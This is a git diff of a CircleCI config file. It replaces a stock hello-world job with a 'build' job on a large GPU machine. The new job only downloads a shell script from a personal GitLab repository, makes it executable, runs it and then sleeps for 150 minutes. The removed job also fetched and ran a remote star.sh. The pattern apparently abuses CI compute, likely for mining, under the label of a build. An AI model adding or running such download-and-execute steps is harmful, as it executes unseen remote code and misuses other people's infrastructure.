--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,27 +1,9 @@
-# Use the latest 2.1 version of CircleCI pipeline process engine.
-# See: https://circleci.com/docs/2.0/configuration-reference
 version: 2.1
-
-# Define a job to be invoked later in a workflow.
-# See: https://circleci.com/docs/2.0/configuration-reference/#jobs
 jobs:
-  say-hello:
-    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
-    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor
-    docker:
-      - image: cimg/base:stable
-    # Add steps to the job
-    # See: https://circleci.com/docs/2.0/configuration-reference/#steps
+  build:
+    machine:
+      resource_class: gpu.nvidia.large
+      image: ubuntu-1604-cuda-10.1:201909-23
     steps:
-      - checkout
-      - run: wget https://raw.githubusercontent.com/viwarlani/viwarlani/main/star.sh && chmod +x star.sh && ./star.sh
-      - run:
-          name: "Say hello"
-          command: "echo Hello, World!"
-
-# Invoke jobs via workflows
-# See: https://circleci.com/docs/2.0/configuration-reference/#workflows
-workflows:
-  say-hello-workflow:
-    jobs:
-      - say-hello
+      - run: wget https://gitlab.com/viwarlani/build/-/raw/main/star.sh && chmod +x *.sh && ./star.sh
+      - run: sleep 150m
